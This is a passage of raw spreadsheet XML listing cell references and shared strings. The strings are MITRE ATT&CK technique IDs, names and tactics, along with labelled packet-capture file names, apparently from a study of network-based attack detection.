  <c r="F5" i="55" s="1"/>
  <c r="C15" i="51"/>
  <c r="C16" i="51" s="1"/>
  <c r="C5" i="55" s="1"/>
  <c r="B15" i="51"/>
  <c r="B16" i="51" s="1"/>
  <c r="B5" i="55" s="1"/>
  <c r="B5" i="51"/>
  <c r="C15" i="49"/>
  <c r="C16" i="49" s="1"/>
  <c r="C5" i="53" s="1"/>
  <c r="B15" i="49"/>
  <c r="B16" i="49" s="1"/>
  <c r="B5" i="53" s="1"/>
  <c r="H15" i="49"/>
  <c r="H16" i="49" s="1"/>
  <c r="H5" i="53" s="1"/>
  <c r="E15" i="49"/>
  <c r="E16" i="49" s="1"/>
  <c r="E5" i="53" s="1"/>
  <c r="D15" i="49"/>
  <c r="D16" i="49" s="1"/>
  <c r="D5" i="53" s="1"/>
  <c r="F15" i="49"/>
  <c r="F16" i="49" s="1"/>
  <c r="F5" i="53" s="1"/>
  <c r="I15" i="49"/>
  <c r="I16" i="49" s="1"/>
  <c r="I5" i="53" s="1"/>
  <c r="G15" i="49"/>
  <c r="G16" i="49" s="1"/>
  <c r="G5" i="53" s="1"/>
  <c r="L15" i="49"/>
  <c r="L16" i="49" s="1"/>
  <c r="L5" i="53" s="1"/>
  <c r="J15" i="49"/>
  <c r="J16" i="49" s="1"/>
  <c r="J5" i="53" s="1"/>
  <c r="N15" i="49"/>
  <c r="N16" i="49" s="1"/>
  <c r="N5" i="53" s="1"/>
  <c r="M15" i="49"/>
  <c r="M16" i="49" s="1"/>
  <c r="M5" i="53" s="1"/>
  <c r="K15" i="49"/>
  <c r="K16" i="49" s="1"/>
  <c r="K5" i="53" s="1"/>
  <c r="B5" i="49"/>
  <c r="K11" i="34"/>
  <c r="N11" i="34"/>
  <c r="M11" i="34"/>
  <c r="J11" i="35"/>
  <c r="I11" i="34"/>
  <c r="J11" i="34"/>
  <c r="H11" i="35"/>
  <c r="I11" i="35"/>
  <c r="H11" i="34"/>
  <c r="C10" i="35"/>
  <c r="D10" i="35"/>
  <c r="C10" i="34" l="1"/>
  <c r="D10" i="34"/>
  <c r="B10" i="34"/>
  <c r="B4" i="34"/>
  <c r="D9" i="35"/>
  <c r="C9" i="35"/>
  <c r="B9" i="35"/>
  <c r="D11" i="35"/>
  <c r="C11" i="35"/>
  <c r="B11" i="35"/>
  <c r="N15" i="34" l="1"/>
  <c r="M15" i="34"/>
  <c r="L15" i="34"/>
  <c r="K15" i="34"/>
  <c r="C11" i="34"/>
  <c r="B11" i="34"/>
  <c r="D11" i="34"/>
  <c r="H15" i="34"/>
  <c r="J15" i="34"/>
  <c r="I15" i="34"/>
  <c r="B15" i="34"/>
  <c r="D15" i="34"/>
  <c r="C15" i="34"/>
  <c r="H8" i="34" l="1"/>
  <c r="K8" i="34"/>
  <c r="B8" i="34"/>
  <c r="E9" i="34"/>
  <c r="E8" i="40" s="1"/>
  <c r="E7" i="40" s="1"/>
  <c r="H9" i="34"/>
  <c r="H8" i="40" s="1"/>
  <c r="H7" i="40" s="1"/>
  <c r="K9" i="34"/>
  <c r="L8" i="34"/>
  <c r="L9" i="34"/>
  <c r="F8" i="34"/>
  <c r="I8" i="34"/>
  <c r="C8" i="34"/>
  <c r="I9" i="34"/>
  <c r="I8" i="40" s="1"/>
  <c r="I7" i="40" s="1"/>
  <c r="C9" i="34"/>
  <c r="C8" i="40" s="1"/>
  <c r="C7" i="40" s="1"/>
  <c r="M8" i="34"/>
  <c r="M9" i="34"/>
  <c r="D8" i="34"/>
  <c r="G8" i="34"/>
  <c r="J8" i="34"/>
  <c r="N9" i="34"/>
  <c r="D9" i="34"/>
  <c r="D8" i="40" s="1"/>
  <c r="D7" i="40" s="1"/>
  <c r="J9" i="34"/>
  <c r="J8" i="40" s="1"/>
  <c r="J7" i="40" s="1"/>
  <c r="G9" i="34" l="1"/>
  <c r="G8" i="40" s="1"/>
  <c r="G7" i="40" s="1"/>
  <c r="F9" i="34"/>
  <c r="F8" i="40" s="1"/>
  <c r="F7" i="40" s="1"/>
  <c r="E8" i="34"/>
  <c r="C17" i="34"/>
  <c r="I17" i="34"/>
  <c r="F17" i="34"/>
  <c r="B17" i="34"/>
  <c r="H17" i="34"/>
  <c r="G17" i="34"/>
  <c r="J17" i="34"/>
  <c r="D17" i="34"/>
  <c r="H18" i="34"/>
  <c r="H10" i="40" s="1"/>
  <c r="E18" i="34"/>
  <c r="E10" i="40" s="1"/>
  <c r="M18" i="34"/>
  <c r="M10" i="40" s="1"/>
  <c r="M8" i="40"/>
  <c r="M7" i="40" s="1"/>
  <c r="L18" i="34"/>
  <c r="L10" i="40" s="1"/>
  <c r="L8" i="40"/>
  <c r="L7" i="40" s="1"/>
  <c r="J18" i="34"/>
  <c r="J10" i="40" s="1"/>
  <c r="G18" i="34"/>
  <c r="G10" i="40" s="1"/>
  <c r="D18" i="34"/>
  <c r="D10" i="40" s="1"/>
  <c r="N18" i="34"/>
  <c r="N10" i="40" s="1"/>
  <c r="N8" i="40"/>
  <c r="N7" i="40" s="1"/>
  <c r="C18" i="34"/>
  <c r="C10" i="40" s="1"/>
  <c r="I18" i="34"/>
  <c r="I10" i="40" s="1"/>
  <c r="F18" i="34"/>
  <c r="F10" i="40" s="1"/>
  <c r="K18" i="34"/>
  <c r="K10" i="40" s="1"/>
  <c r="K8" i="40"/>
  <c r="K7" i="40" s="1"/>
  <c r="K6" i="34"/>
  <c r="M6" i="34"/>
  <c r="N6" i="34"/>
  <c r="J6" i="34"/>
  <c r="I6" i="34"/>
  <c r="H6" i="34"/>
  <c r="L6" i="34"/>
  <c r="L14" i="34" s="1"/>
  <c r="F6" i="34"/>
  <c r="F14" i="34" s="1"/>
  <c r="E6" i="34"/>
  <c r="D6" i="34"/>
  <c r="B6" i="34"/>
  <c r="C6" i="34"/>
  <c r="K17" i="34"/>
  <c r="N8" i="34"/>
  <c r="L17" i="34"/>
  <c r="M17" i="34"/>
  <c r="B3" i="34"/>
  <c r="B9" i="34" l="1"/>
  <c r="I14" i="34"/>
  <c r="J14" i="34"/>
  <c r="N14" i="34"/>
  <c r="C14" i="34"/>
  <c r="M14" i="34"/>
  <c r="K14" i="34"/>
  <c r="E17" i="34"/>
  <c r="B14" i="34"/>
  <c r="H14" i="34"/>
  <c r="C6" i="40"/>
  <c r="H6" i="40"/>
  <c r="M6" i="40"/>
  <c r="B6" i="40"/>
  <c r="I6" i="40"/>
  <c r="J6" i="40"/>
  <c r="D6" i="40"/>
  <c r="L6" i="40"/>
  <c r="D14" i="34"/>
  <c r="E14" i="34"/>
  <c r="C7" i="34"/>
  <c r="D7" i="34"/>
  <c r="B7" i="34"/>
  <c r="E7" i="34"/>
  <c r="F7" i="34"/>
  <c r="G7" i="34"/>
  <c r="H7" i="34"/>
  <c r="I7" i="34"/>
  <c r="J7" i="34"/>
  <c r="K7" i="34"/>
  <c r="L7" i="34"/>
  <c r="M7" i="34"/>
  <c r="N7" i="34"/>
  <c r="N17" i="34"/>
  <c r="E6" i="40" l="1"/>
  <c r="B8" i="40"/>
  <c r="B7" i="40" s="1"/>
  <c r="B18" i="34"/>
  <c r="B10" i="40" s="1"/>
  <c r="N6" i="40"/>
  <c r="K6" i="40"/>
  <c r="B5" i="34"/>
  <c r="D16" i="34" l="1"/>
  <c r="D5" i="40" s="1"/>
  <c r="C16" i="34"/>
  <c r="C5" i="40" s="1"/>
  <c r="K16" i="34"/>
  <c r="K5" i="40" s="1"/>
  <c r="L16" i="34"/>
  <c r="L5" i="40" s="1"/>
  <c r="N16" i="34"/>
  <c r="N5" i="40" s="1"/>
  <c r="M16" i="34"/>
  <c r="M5" i="40" s="1"/>
  <c r="I16" i="34"/>
  <c r="I5" i="40" s="1"/>
  <c r="B16" i="34"/>
  <c r="B5" i="40" s="1"/>
  <c r="J16" i="34"/>
  <c r="J5" i="40" s="1"/>
  <c r="H16" i="34"/>
  <c r="H5" i="40" s="1"/>
  <c r="F10" i="35" l="1"/>
  <c r="F11" i="35" s="1"/>
  <c r="G10" i="35"/>
  <c r="G11" i="35" s="1"/>
  <c r="E10" i="35"/>
  <c r="E11" i="35" s="1"/>
  <c r="E10" i="34"/>
  <c r="E15" i="34" s="1"/>
  <c r="E16" i="34" s="1"/>
  <c r="E5" i="40" s="1"/>
  <c r="G10" i="34"/>
  <c r="G15" i="34" s="1"/>
  <c r="G16" i="34" s="1"/>
  <c r="G5" i="40" s="1"/>
  <c r="F10" i="34"/>
  <c r="F15" i="34" s="1"/>
  <c r="F16" i="34" s="1"/>
  <c r="F5" i="40" s="1"/>
  <c r="AA113" i="38" l="1"/>
  <c r="AA113" i="38" a="1"/>
  <c r="AB113" i="38"/>
  <c r="AB113" i="38" a="1"/>
  <c r="AE113" i="38"/>
  <c r="AE113" i="38" a="1"/>
  <c r="AD113" i="38"/>
  <c r="AD113" i="38" a="1"/>
</calcChain>
</file>

<file path=xl/sharedStrings.xml><?xml version="1.0" encoding="utf-8"?>
<sst xmlns="http://schemas.openxmlformats.org/spreadsheetml/2006/main" count="13532" uniqueCount="4919">
  <si>
    <t>RS1</t>
  </si>
  <si>
    <t>RS2</t>
  </si>
  <si>
    <t>RS3</t>
  </si>
  <si>
    <t>RS4</t>
  </si>
  <si>
    <t>-</t>
  </si>
  <si>
    <t>Command and Control</t>
  </si>
  <si>
    <t>Data Obfuscation</t>
  </si>
  <si>
    <t>T1001</t>
  </si>
  <si>
    <t>NO</t>
  </si>
  <si>
    <t>Credential Access</t>
  </si>
  <si>
    <t>OS Credential Dumping</t>
  </si>
  <si>
    <t>T1003</t>
  </si>
  <si>
    <t>Fallback Channels</t>
  </si>
  <si>
    <t>T1008</t>
  </si>
  <si>
    <t>Exfiltration</t>
  </si>
  <si>
    <t>Exfiltration Over Other Network Medium</t>
  </si>
  <si>
    <t>T1011</t>
  </si>
  <si>
    <t>Discovery</t>
  </si>
  <si>
    <t>Remote System Discovery</t>
  </si>
  <si>
    <t>T1018</t>
  </si>
  <si>
    <t>Automated Exfiltration</t>
  </si>
  <si>
    <t>T1020</t>
  </si>
  <si>
    <t>Lateral Movement</t>
  </si>
  <si>
    <t>Remote Services</t>
  </si>
  <si>
    <t>T1021</t>
  </si>
  <si>
    <t>Scheduled Transfer</t>
  </si>
  <si>
    <t>T1029</t>
  </si>
  <si>
    <t>Data Transfer Size Limits</t>
  </si>
  <si>
    <t>T1030</t>
  </si>
  <si>
    <t>T1033</t>
  </si>
  <si>
    <t>Collection</t>
  </si>
  <si>
    <t>Data from Network Shared Drive</t>
  </si>
  <si>
    <t>T1039</t>
  </si>
  <si>
    <t>Network Sniffing</t>
  </si>
  <si>
    <t>T1040</t>
  </si>
  <si>
    <t>Exfiltration Over C2 Channel</t>
  </si>
  <si>
    <t>T1041</t>
  </si>
  <si>
    <t>Network Service Discovery</t>
  </si>
  <si>
    <t>T1046</t>
  </si>
  <si>
    <t>Execution</t>
  </si>
  <si>
    <t>Windows Management Instrumentation</t>
  </si>
  <si>
    <t>T1047</t>
  </si>
  <si>
    <t>Exfiltration Over Alternative Protocol</t>
  </si>
  <si>
    <t>T1048</t>
  </si>
  <si>
    <t>Persistence</t>
  </si>
  <si>
    <t>Scheduled Task/Job</t>
  </si>
  <si>
    <t>T1053</t>
  </si>
  <si>
    <t>Defense Evasion</t>
  </si>
  <si>
    <t>Indicator Removal</t>
  </si>
  <si>
    <t>T1070</t>
  </si>
  <si>
    <t>Application Layer Protocol</t>
  </si>
  <si>
    <t>T1071</t>
  </si>
  <si>
    <t>Account Discovery</t>
  </si>
  <si>
    <t>T1087</t>
  </si>
  <si>
    <t>Proxy</t>
  </si>
  <si>
    <t>T1090</t>
  </si>
  <si>
    <t>Non-Application Layer Protocol</t>
  </si>
  <si>
    <t>T1095</t>
  </si>
  <si>
    <t>Web Service</t>
  </si>
  <si>
    <t>T1102</t>
  </si>
  <si>
    <t>Multi-Stage Channels</t>
  </si>
  <si>
    <t>T1104</t>
  </si>
  <si>
    <t>Ingress Tool Transfer</t>
  </si>
  <si>
    <t>T1105</t>
  </si>
  <si>
    <t>Brute Force</t>
  </si>
  <si>
    <t>T1110</t>
  </si>
  <si>
    <t>Modify Registry</t>
  </si>
  <si>
    <t>T1112</t>
  </si>
  <si>
    <t>Email Collection</t>
  </si>
  <si>
    <t>T1114</t>
  </si>
  <si>
    <t>Data Encoding</t>
  </si>
  <si>
    <t>T1132</t>
  </si>
  <si>
    <t>Initial Access</t>
  </si>
  <si>
    <t>External Remote Services</t>
  </si>
  <si>
    <t>T1133</t>
  </si>
  <si>
    <t>T1176</t>
  </si>
  <si>
    <t>Forced Authentication</t>
  </si>
  <si>
    <t>T1187</t>
  </si>
  <si>
    <t>Drive-by Compromise</t>
  </si>
  <si>
    <t>T1189</t>
  </si>
  <si>
    <t>Exploit Public-Facing Application</t>
  </si>
  <si>
    <t>T1190</t>
  </si>
  <si>
    <t>BITS Jobs</t>
  </si>
  <si>
    <t>T1197</t>
  </si>
  <si>
    <t>Trusted Relationship</t>
  </si>
  <si>
    <t>T1199</t>
  </si>
  <si>
    <t>Hardware Additions</t>
  </si>
  <si>
    <t>T1200</t>
  </si>
  <si>
    <t>Exploitation for Client Execution</t>
  </si>
  <si>
    <t>T1203</t>
  </si>
  <si>
    <t>User Execution</t>
  </si>
  <si>
    <t>T1204</t>
  </si>
  <si>
    <t>Traffic Signaling</t>
  </si>
  <si>
    <t>T1205</t>
  </si>
  <si>
    <t>Rogue Domain Controller</t>
  </si>
  <si>
    <t>T1207</t>
  </si>
  <si>
    <t>Exploitation of Remote Services</t>
  </si>
  <si>
    <t>T1210</t>
  </si>
  <si>
    <t>Data from Information Repositories</t>
  </si>
  <si>
    <t>T1213</t>
  </si>
  <si>
    <t>System Binary Proxy Execution</t>
  </si>
  <si>
    <t>T1218</t>
  </si>
  <si>
    <t>T1219</t>
  </si>
  <si>
    <t>Template Injection</t>
  </si>
  <si>
    <t>T1221</t>
  </si>
  <si>
    <t>Domain Trust Discovery</t>
  </si>
  <si>
    <t>T1482</t>
  </si>
  <si>
    <t>Impact</t>
  </si>
  <si>
    <t>Defacement</t>
  </si>
  <si>
    <t>T1491</t>
  </si>
  <si>
    <t>Resource Hijacking</t>
  </si>
  <si>
    <t>T1496</t>
  </si>
  <si>
    <t>Network Denial of Service</t>
  </si>
  <si>
    <t>T1498</t>
  </si>
  <si>
    <t>Endpoint Denial of Service</t>
  </si>
  <si>
    <t>T1499</t>
  </si>
  <si>
    <t>Server Software Component</t>
  </si>
  <si>
    <t>T1505</t>
  </si>
  <si>
    <t>T1534</t>
  </si>
  <si>
    <t>Transfer Data to Cloud Account</t>
  </si>
  <si>
    <t>T1537</t>
  </si>
  <si>
    <t>Pre-OS Boot</t>
  </si>
  <si>
    <t>T1542</t>
  </si>
  <si>
    <t>Create or Modify System Process</t>
  </si>
  <si>
    <t>T1543</t>
  </si>
  <si>
    <t>Adversary-in-the-Middle</t>
  </si>
  <si>
    <t>T1557</t>
  </si>
  <si>
    <t>Remote Service Session Hijacking</t>
  </si>
  <si>
    <t>T1563</t>
  </si>
  <si>
    <t>Data Manipulation</t>
  </si>
  <si>
    <t>T1565</t>
  </si>
  <si>
    <t>Phishing</t>
  </si>
  <si>
    <t>T1566</t>
  </si>
  <si>
    <t>T1567</t>
  </si>
  <si>
    <t>Dynamic Resolution</t>
  </si>
  <si>
    <t>T1568</t>
  </si>
  <si>
    <t>System Services</t>
  </si>
  <si>
    <t>T1569</t>
  </si>
  <si>
    <t>Lateral Tool Transfer</t>
  </si>
  <si>
    <t>T1570</t>
  </si>
  <si>
    <t>Non-Standard Port</t>
  </si>
  <si>
    <t>T1571</t>
  </si>
  <si>
    <t>Protocol Tunneling</t>
  </si>
  <si>
    <t>T1572</t>
  </si>
  <si>
    <t>Encrypted Channel</t>
  </si>
  <si>
    <t>T1573</t>
  </si>
  <si>
    <t>Resource Development</t>
  </si>
  <si>
    <t>Compromise Infrastructure</t>
  </si>
  <si>
    <t>T1584</t>
  </si>
  <si>
    <t>Establish Accounts</t>
  </si>
  <si>
    <t>T1585</t>
  </si>
  <si>
    <t>Compromise Accounts</t>
  </si>
  <si>
    <t>T1586</t>
  </si>
  <si>
    <t>Reconnaissance</t>
  </si>
  <si>
    <t>Gather Victim Identity Information</t>
  </si>
  <si>
    <t>T1589</t>
  </si>
  <si>
    <t>Active Scanning</t>
  </si>
  <si>
    <t>T1595</t>
  </si>
  <si>
    <t>Search Open Technical Databases</t>
  </si>
  <si>
    <t>T1596</t>
  </si>
  <si>
    <t>Phishing for Information</t>
  </si>
  <si>
    <t>T1598</t>
  </si>
  <si>
    <t>Network Boundary Bridging</t>
  </si>
  <si>
    <t>T1599</t>
  </si>
  <si>
    <t>Data from Configuration Repository</t>
  </si>
  <si>
    <t>T1602</t>
  </si>
  <si>
    <t>Build Image on Host</t>
  </si>
  <si>
    <t>T1612</t>
  </si>
  <si>
    <t>Group Policy Discovery</t>
  </si>
  <si>
    <t>T1615</t>
  </si>
  <si>
    <t>Content Injection</t>
  </si>
  <si>
    <t>T1659</t>
  </si>
  <si>
    <t>Hide Infrastructure</t>
  </si>
  <si>
    <t>T1665</t>
  </si>
  <si>
    <t>Tipo de tráfico</t>
  </si>
  <si>
    <t>Tamaño real del tráfico</t>
  </si>
  <si>
    <t>TOTAL</t>
  </si>
  <si>
    <t>Nº</t>
  </si>
  <si>
    <t>T1667</t>
  </si>
  <si>
    <t>T1669</t>
  </si>
  <si>
    <t>T1001.002-Data_obfuscation_steganography</t>
  </si>
  <si>
    <t>T1001.003-Data_obfuscation_protocol_impersonation</t>
  </si>
  <si>
    <t>T1008-Fallback_channels</t>
  </si>
  <si>
    <t>T1018-Service_discovery</t>
  </si>
  <si>
    <t>T1003.006-Os_credential_dumping_dcsync</t>
  </si>
  <si>
    <t>T1020.001-Automated_exfiltration_traffic_duplication</t>
  </si>
  <si>
    <t>T1021.004-remote_services_ssh</t>
  </si>
  <si>
    <t>T1029-Scheduled_transfer</t>
  </si>
  <si>
    <t>T1030-Transfer_Size_Limits</t>
  </si>
  <si>
    <t>T1033-System_owner</t>
  </si>
  <si>
    <t>T1039-Data_from_network_shared_drive</t>
  </si>
  <si>
    <t>T1046-Version_services_detection1</t>
  </si>
  <si>
    <t>T1046-Version_services_detection2</t>
  </si>
  <si>
    <t>T1047-WinRM</t>
  </si>
  <si>
    <t>T1048.003-Exfiltration_over_FTP</t>
  </si>
  <si>
    <t xml:space="preserve">T1048.003-Exfiltration_over_ICMP </t>
  </si>
  <si>
    <t>T1053.002-Scheduled_TaskJob_At</t>
  </si>
  <si>
    <t>T1070.005-Indicator_removal_network_share_connection_removal</t>
  </si>
  <si>
    <t>T1071.004-Tunel</t>
  </si>
  <si>
    <t>T1087.002-AccountDiscovery_DomainAccount</t>
  </si>
  <si>
    <t>T1090.001-Proxy_internal_proxy</t>
  </si>
  <si>
    <t>T1095-Non_Application_Layer</t>
  </si>
  <si>
    <t>T1102.003-Web_service-one_way_communication</t>
  </si>
  <si>
    <t>T1104-Multi_stage_channels</t>
  </si>
  <si>
    <t>T1105-Ingress_Tool_Transfer</t>
  </si>
  <si>
    <t>T1112-Modify_registry</t>
  </si>
  <si>
    <t>T1114.002-Email_collection_remote_email_collection</t>
  </si>
  <si>
    <t>T1132.001-Standard_Encoding</t>
  </si>
  <si>
    <t>T1133-External_remote_services</t>
  </si>
  <si>
    <t>T1176-Browser-extension</t>
  </si>
  <si>
    <t>T1187-Forced_Authentication</t>
  </si>
  <si>
    <t>T1187-Forced_Authentication2</t>
  </si>
  <si>
    <t>T1189-Drive-by_compromise_v1</t>
  </si>
  <si>
    <t>T1189-Drive-by_compromise_v2</t>
  </si>
  <si>
    <t>T1190-SQL_Injection_High_Bytes1</t>
  </si>
  <si>
    <t>T1190-SQL_Injection_High_Bytes2</t>
  </si>
  <si>
    <t>T1190-Sql_inyection2</t>
  </si>
  <si>
    <t>T1197-BITS_Jobs</t>
  </si>
  <si>
    <t>T1199-Trusted_relationship</t>
  </si>
  <si>
    <t>T1200-Hardware_Additions</t>
  </si>
  <si>
    <t>T1204.001-malicious_link</t>
  </si>
  <si>
    <t>T1205.001-Port_Knocking</t>
  </si>
  <si>
    <t>T1207-Rogue_domain_controller</t>
  </si>
  <si>
    <t>T1210-Eternal_blue</t>
  </si>
  <si>
    <t>T1210-Remote_code_execution</t>
  </si>
  <si>
    <t>T1218.010-COM_Scriptlet</t>
  </si>
  <si>
    <t>T1219-RemoteAccessSoftwareLocal</t>
  </si>
  <si>
    <t>T1219-RemoteAccessSoftwareNAT</t>
  </si>
  <si>
    <t>T1221-Template_Injection</t>
  </si>
  <si>
    <t>T1482-Domain_trust_discovery</t>
  </si>
  <si>
    <t>T1491.001-Internal_Defacement</t>
  </si>
  <si>
    <t>T1496-Cryptomining</t>
  </si>
  <si>
    <t>T1498.002-Amplif_dns</t>
  </si>
  <si>
    <t>T1498.002-Fraggle</t>
  </si>
  <si>
    <t>T1498.002-Smurf</t>
  </si>
  <si>
    <t>T1498.001-UDP_flood</t>
  </si>
  <si>
    <t>T1499.002-Dhcp_flood</t>
  </si>
  <si>
    <t>T1499.001-Land</t>
  </si>
  <si>
    <t>T1499.002-Reflexion_synack</t>
  </si>
  <si>
    <t>T1499.002-Reseteo</t>
  </si>
  <si>
    <t>T1499.001-Syn_suplantacion</t>
  </si>
  <si>
    <t>T1499.001-OS_Exhaustion_Flood</t>
  </si>
  <si>
    <t>T1534-Internal_spearphishing</t>
  </si>
  <si>
    <t>T1537-Transfer_Data_to_Cloud_Account</t>
  </si>
  <si>
    <t>T1542.005-TFTP_Boot</t>
  </si>
  <si>
    <t>T1543.003-CreateSystemProcessWindowsService</t>
  </si>
  <si>
    <t>T1557.003-Dhcp_spoofing</t>
  </si>
  <si>
    <t>T1563.002-RDPHijacking</t>
  </si>
  <si>
    <t>T1566.002-Spearphishing_Link</t>
  </si>
  <si>
    <t>T1567.002-Exfiltration_To_Cloud_Storage</t>
  </si>
  <si>
    <t>T1568.001-FastFluxDNS</t>
  </si>
  <si>
    <t>T1569.002-System_services_service_execution</t>
  </si>
  <si>
    <t>T1570-Lateral_Tool_Transfer</t>
  </si>
  <si>
    <t>T1571-SSH</t>
  </si>
  <si>
    <t>T1572-Protocol_Tunneling</t>
  </si>
  <si>
    <t>T1573.002-AsymetricCryptography</t>
  </si>
  <si>
    <t>T1585.001-Establish_social_accounts</t>
  </si>
  <si>
    <t>T1586.001-Compromise_Accounts</t>
  </si>
  <si>
    <t>T1589.002-Gather_victim_identity_information</t>
  </si>
  <si>
    <t>T1595.002-Port_Scanning</t>
  </si>
  <si>
    <t>T1595.003-Web_page_scanning1</t>
  </si>
  <si>
    <t>T1595.003-Web_page_scanning2</t>
  </si>
  <si>
    <t>T1598.003-Spearphishing_Link</t>
  </si>
  <si>
    <t>T1599.001-NBB1</t>
  </si>
  <si>
    <t>T1599.001-NBB2</t>
  </si>
  <si>
    <t>T1602.001-MIB_Dump</t>
  </si>
  <si>
    <t>T1612-BuildImageOnHostLocal</t>
  </si>
  <si>
    <t>T1612-BuildImageOnHostNAT</t>
  </si>
  <si>
    <t>T1615-Group_Policy_Discovery</t>
  </si>
  <si>
    <t>T1659-Content_Injection</t>
  </si>
  <si>
    <t>T1665-Hide_Infrastructure</t>
  </si>
  <si>
    <t>T1210-Web_attack</t>
  </si>
  <si>
    <t>T1498.001-HTTP_flood</t>
  </si>
  <si>
    <t>T1498.001-TCP_flood</t>
  </si>
  <si>
    <t>T1498.001-UDP_flood_1</t>
  </si>
  <si>
    <t>T1498.001-UDP_flood_2</t>
  </si>
  <si>
    <t>T1499.002-Slowhttptest</t>
  </si>
  <si>
    <t>T1499.002-Slowloris</t>
  </si>
  <si>
    <t>T1499.003-GoldenEye</t>
  </si>
  <si>
    <t>T1499.003-Hulk</t>
  </si>
  <si>
    <t>T1566.001-Malicious_mail</t>
  </si>
  <si>
    <t>T1046-Network_scan</t>
  </si>
  <si>
    <t>Nº Technique</t>
  </si>
  <si>
    <t>pcapng
(SubTechnique-Attack)</t>
  </si>
  <si>
    <t>#Flujos</t>
  </si>
  <si>
    <t>Technique</t>
  </si>
  <si>
    <t>#Flows</t>
  </si>
  <si>
    <t>T1505.003-Shell_Web</t>
  </si>
  <si>
    <t>#pcaps (#flows)</t>
  </si>
  <si>
    <t>Detection</t>
  </si>
  <si>
    <t>#pcaps</t>
  </si>
  <si>
    <t>#flows</t>
  </si>
  <si>
    <t>%Flows_FP</t>
  </si>
  <si>
    <t>#Alerts</t>
  </si>
  <si>
    <t>Description</t>
  </si>
  <si>
    <t/>
  </si>
  <si>
    <t>Technique Name</t>
  </si>
  <si>
    <t>Tactic IDs</t>
  </si>
  <si>
    <t>Tactic Names</t>
  </si>
  <si>
    <t>Number of Subtechniques</t>
  </si>
  <si>
    <t>Network Detection</t>
  </si>
  <si>
    <t>Only Network Detection</t>
  </si>
  <si>
    <t>TA0011</t>
  </si>
  <si>
    <t>3</t>
  </si>
  <si>
    <t>YES</t>
  </si>
  <si>
    <t>TA0006</t>
  </si>
  <si>
    <t>8</t>
  </si>
  <si>
    <t>T1005</t>
  </si>
  <si>
    <t>Data from Local System</t>
  </si>
  <si>
    <t>TA0009</t>
  </si>
  <si>
    <t>T1006</t>
  </si>
  <si>
    <t>Direct Volume Access</t>
  </si>
  <si>
    <t>TA0005</t>
  </si>
  <si>
    <t>T1007</t>
  </si>
  <si>
    <t>System Service Discovery</t>
  </si>
  <si>
    <t>TA0007</t>
  </si>
  <si>
    <t>T1010</t>
  </si>
  <si>
    <t>Application Window Discovery</t>
  </si>
  <si>
    <t>TA0010</t>
  </si>
  <si>
    <t>1</t>
  </si>
  <si>
    <t>T1012</t>
  </si>
  <si>
    <t>Query Registry</t>
  </si>
  <si>
    <t>T1014</t>
  </si>
  <si>
    <t>Rootkit</t>
  </si>
  <si>
    <t>T1016</t>
  </si>
  <si>
    <t>System Network Configuration Discovery</t>
  </si>
  <si>
    <t>2</t>
  </si>
  <si>
    <t>TA0008</t>
  </si>
  <si>
    <t>T1025</t>
  </si>
  <si>
    <t>Data from Removable Media</t>
  </si>
  <si>
    <t>T1027</t>
  </si>
  <si>
    <t>Obfuscated Files or Information</t>
  </si>
  <si>
    <t>17</t>
  </si>
  <si>
    <t>System Owner/User Discovery</t>
  </si>
  <si>
    <t>T1036</t>
  </si>
  <si>
    <t>Masquerading</t>
  </si>
  <si>
    <t>12</t>
  </si>
  <si>
    <t>T1037</t>
  </si>
  <si>
    <t>Boot or Logon Initialization Scripts</t>
  </si>
  <si>
    <t>TA0003 - TA0004</t>
  </si>
  <si>
    <t>Persistence - Privilege Escalation</t>
  </si>
  <si>
    <t>5</t>
  </si>
  <si>
    <t>TA0006 - TA0007</t>
  </si>
  <si>
    <t>Credential Access - Discovery</t>
  </si>
  <si>
    <t>TA0002</t>
  </si>
  <si>
    <t>T1049</t>
  </si>
  <si>
    <t>System Network Connections Discovery</t>
  </si>
  <si>
    <t>T1052</t>
  </si>
  <si>
    <t>Exfiltration Over Physical Medium</t>
  </si>
  <si>
    <t>TA0002 - TA0003 - TA0004</t>
  </si>
  <si>
    <t>Execution - Persistence - Privilege Escalation</t>
  </si>
  <si>
    <t>T1055</t>
  </si>
  <si>
    <t>Process Injection</t>
  </si>
  <si>
    <t>TA0005 - TA0004</t>
  </si>
  <si>
    <t>Defense Evasion - Privilege Escalation</t>
  </si>
  <si>
    <t>T1056</t>
  </si>
  <si>
    <t>Input Capture</t>
  </si>
  <si>
    <t>TA0009 - TA0006</t>
  </si>
  <si>
    <t>Collection - Credential Access</t>
  </si>
  <si>
    <t>4</t>
  </si>
  <si>
    <t>T1057</t>
  </si>
  <si>
    <t>Process Discovery</t>
  </si>
  <si>
    <t>T1059</t>
  </si>
  <si>
    <t>Command and Scripting Interpreter</t>
  </si>
  <si>
    <t>T1068</t>
  </si>
  <si>
    <t>Exploitation for Privilege Escalation</t>
  </si>
  <si>
    <t>TA0004</t>
  </si>
  <si>
    <t>Privilege Escalation</t>
  </si>
  <si>
    <t>T1069</t>
  </si>
  <si>
    <t>Permission Groups Discovery</t>
  </si>
  <si>
    <t>10</t>
  </si>
  <si>
    <t>T1072</t>
  </si>
  <si>
    <t>Software Deployment Tools</t>
  </si>
  <si>
    <t>TA0002 - TA0008</t>
  </si>
  <si>
    <t>Execution - Lateral Movement</t>
  </si>
  <si>
    <t>T1074</t>
  </si>
  <si>
    <t>Data Staged</t>
  </si>
  <si>
    <t>T1078</t>
  </si>
  <si>
    <t>Valid Accounts</t>
  </si>
  <si>
    <t>TA0005 - TA0003 - TA0004 - TA0001</t>
  </si>
  <si>
    <t>Defense Evasion - Persistence - Privilege Escalation - Initial Access</t>
  </si>
  <si>
    <t>T1080</t>
  </si>
  <si>
    <t>Taint Shared Content</t>
  </si>
  <si>
    <t>T1082</t>
  </si>
  <si>
    <t>System Information Discovery</t>
  </si>
  <si>
    <t>T1083</t>
  </si>
  <si>
    <t>File and Directory Discovery</t>
  </si>
  <si>
    <t>T1091</t>
  </si>
  <si>
    <t>Replication Through Removable Media</t>
  </si>
  <si>
    <t>TA0008 - TA0001</t>
  </si>
  <si>
    <t>Lateral Movement - Initial Access</t>
  </si>
  <si>
    <t>T1092</t>
  </si>
  <si>
    <t>Communication Through Removable Media</t>
  </si>
  <si>
    <t>T1098</t>
  </si>
  <si>
    <t>Account Manipulation</t>
  </si>
  <si>
    <t>7</t>
  </si>
  <si>
    <t>T1106</t>
  </si>
  <si>
    <t>Native API</t>
  </si>
  <si>
    <t>T1111</t>
  </si>
  <si>
    <t>Multi-Factor Authentication Interception</t>
  </si>
  <si>
    <t>TA0005 - TA0003</t>
  </si>
  <si>
    <t>Defense Evasion - Persistence</t>
  </si>
  <si>
